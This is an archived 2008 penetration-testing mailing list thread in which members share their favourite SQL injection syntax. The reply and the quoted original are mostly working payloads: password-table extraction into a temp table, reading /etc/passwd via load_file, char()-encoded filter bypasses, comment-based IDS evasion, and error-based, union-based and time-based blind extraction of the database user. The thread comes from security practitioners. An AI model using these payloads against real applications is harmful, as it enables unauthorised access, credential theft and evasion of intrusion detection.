Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: SQL Injection Techniques (favorite syntaxes)...help requested...
From: Roy Firestein <lists () rturf net>
Date: Sun, 15 Jun 2008 15:11:13 -0400

´╗┐This is what I use when doing a manual scan. I added a few more I found
recently.

Waiting to see more replies.

Gathering Infomation:
- ' or 1 in (select @@version)--
- ' union all select @@version--
Those will Find the actual Version of the computer, OS/service pack.

Grabbing Passwords:
'; begin declare @var varchar(8000) set @var=':' select @var= () var
+'+login+'/'+password+' ' from users where login > @var select @var as
var into temp end --

' and 1 in (select var from temp)--


Files and Config:
 ' union select 1,load_file('/etc/passwd'),1,1,1;
´╗┐' and 1 in (select @@servername)--
' and 1 in (select servername from master.sysservers)--
 ' and 1 in (select servername from master.sysservers)--

mySQL Input Validation Circumvention using Char():

Inject without quotes (string = "%"):
--> ' or username like char(37);
Inject with quotes (string="root"):
--> ' union select * from users where login = char(114,111,111,116);
load files in unions (string = "/etc/passwd"):
-->' union select
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Check for existing files (string = "n.ext"):
-->' and
1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));

IDS Signature Evasion using comments:

-->'/**/OR/**/1/**/=/**/1
-->Username:' or 1/*
-->Password:*/=1--
-->UNI/**/ON SEL/**/ECT
-->(Oracle)     '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
-->(MS SQL)    '; EXEC ('SEL' + 'ECT US' + 'ER')


Strings without quotes:
--> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) +
char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) +
char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)


On Fri, 2008-06-13 at 18:31 -0400, Joseph McCray wrote:
Hey everybody, I'm working on a few projects related to SQL Injection
and trying to kill a few birds with 1 stone. 

I'm curious what are your favorite methods for identifying and
exploiting SQL Injection. I'm looking for example syntax here that
you've found has worked well for you in the past.


Here are a few snippets of techniques I like to use, I'm looking for
example syntax for data exfiltration via DNS, and IDS Evasion with SQL
Injection.


              Error-Based
#####################################################
Error-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.



              Union-Based
#####################################################
Union-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--


              Traditional Blind
#####################################################
http://[site]/page.asp?id=1
http://[site]/page.asp?id=1


              Time-Based Blind
#####################################################
Blind SQL Injection Syntax for extracting the USER

3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
(+10 seconds)

D  - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98)
WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99)
WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
(+10 seconds)
 
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
 
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
(+10 seconds)

Database User = DBO







------------------------------------------------------------------------
This list is sponsored by: Cenzic

Top 5 Common Mistakes in 
Securing Web Applications
Get 45 Min Video and PPT Slides

www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]